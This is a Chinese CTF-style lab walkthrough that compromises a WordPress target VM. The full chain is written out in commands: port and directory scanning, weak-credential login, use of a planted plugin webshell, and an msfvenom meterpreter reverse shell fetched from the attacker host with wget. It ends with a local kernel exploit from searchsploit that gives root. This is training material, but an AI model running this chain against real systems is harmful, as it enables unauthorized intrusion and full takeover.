本文最后更新于194天前,其中的信息可能已经过时,如有错误请在评论区悄悄告诉我~~~
一、题目
任务编号 | 任务描述 | FLAG |
---|---|---|
1 | 使用 nmap 扫描靶机系统,将靶机21-27017开放的端口号按从小到大的顺序作为 flag 提交。flag格式:flag[端口1,端口 2···,端口 n) | |
2 | 通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为 fag 提交。flag 格式:flag用户名,密码] | |
3 | 使用弱口令进行登录找到后台存在webshell后门文件url路径作为flag提交flag格式:flag{wordpress/**/**/**.php} | |
4 | 利用 Kali 渗透机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为flag 提交。flag 格式:flag[单词} | |
5 | 对上述木马文件进行修改后上传到靶机系统中,使用 MSF 开启监听,将获得的当前权限的用户名作为flag 提交。flag 格式:flag(用户名} | |
6 | 查看系统内核版本信息,将系统内核版本号作为 flag 提交。flag 格式:flag版本号) | |
7 | 在 Kali 攻击机中查找可使用的漏洞源码或者exp,将找到的漏洞源码文件名或者 exp 作为flag 提交。flag 格式:flag(文件名) | |
8 | 利用上述漏洞源码后获得到的靶机/root 下的唯一.txt 文件的文件名作为 flag 提交。flag 格式:flag(文件名] | |
9 | 利用上述漏洞源码后将获得到的靶机/root 下的唯一.txt 文件的文件内容作为 flag 提交flag 形式:flagf文件内容} |
为了拿到FLAG这是我的解题步骤,还有更简单的方法!!!
二、攻击过程
1. 使用arp-scan确定靶机的ip
arp-scan -l
2. 使用nmap扫描靶机开放的端口
nmap -sS -sV -p- --min-rate 10000 192.168.88.182
3. 发现80端口是开启的,使用目录扫描工具dirb扫描一下
dirb http://192.168.88.182 -o web.txt
4. 使用工具扫描wordpress
whatweb http://192.168.88.182/wordpress
wpscan --url http://192.168.88.182/wordpress
5. 发现后台是弱口令,登录成功
- 账号:admin
- 密码:123456
6. 在插件目录发现后门存在
后门地址为:http://192.168.88.182/wordpress/wp-content/plugins/akismet/index.php
并且可以执行系统命令,权限为www-data
7. 使用kali的msfvenom生成shell
msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf -o /root/shell/webshell.elf -a x64 LHOST=192.168.88.128 LPORT=8956
8. 启动nginx,把shell放在对应的目录下
cp shell/webshell.elf /html/webshell.elf
9. 通过system后门执行命令寻找有权限的地方
view-source:http://192.168.88.182/wordpress/wp-content/plugins/akismet/index.php?cmd=ls -l
发现/tmp这个目录下有权限
10. 通过wget命令下载我们准备好的后门文件
wget -P /tmp -b http://192.168.88.128/webshell.elf
view-source:http://192.168.88.182/wordpress/wp-content/plugins/akismet/index.php?cmd=wget -P /tmp -b http://192.168.88.128/webshell.elf
11. 下载好后,查看并且添加执行权限
view-source:http://192.168.88.182/wordpress/wp-content/plugins/akismet/index.php?cmd=ls -l /tmp
view-source:http://192.168.88.182/wordpress/wp-content/plugins/akismet/index.php?cmd=chmod 777 /tmp/webshell.elf
12. 打开msfconsole进行监听 msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp
set LHOST 192.168.88.128
set LPORT 8956
13. 启动监听
run
14. 在浏览器的命令窗口执行shell
view-source:http://192.168.88.182/wordpress/wp-content/plugins/akismet/index.php?cmd=/tmp/webshell.elf
15. 成功反弹shell
16. 查看系统版本
sysinfo
17. 使用searchsploit进行漏洞查找
searchsploit 3.13.0
18. 导出对应文件
searchsploit -m linux/local/37292.c
19. 使用msfconsole上传到靶机对应有权限的目录
upload /root/37292.c #上传命令 指定的是本地的文件位置
20. 进入shell,编译文件
shell
gcc 37292.c
21. 执行文件
./a.out
22. 成功拿到root权限
三、附录
1. wordpress目录结构
主目录
[文件夹] wp-admin
[文件夹] wp-includes
[文件夹]wp-content
index.php
license.txt
readme.html
wp-activate.php
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-cron.php
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
wp-content目录下
[文件夹] themes 主题
[文件夹] plugins 插件
[文件夹] uploads 上传的图片和媒体文件
index.php
2. msfvenom使用
3. nginx
nginx 启动
nginx -s stop 停止
nginx -t 查看配置文件的位置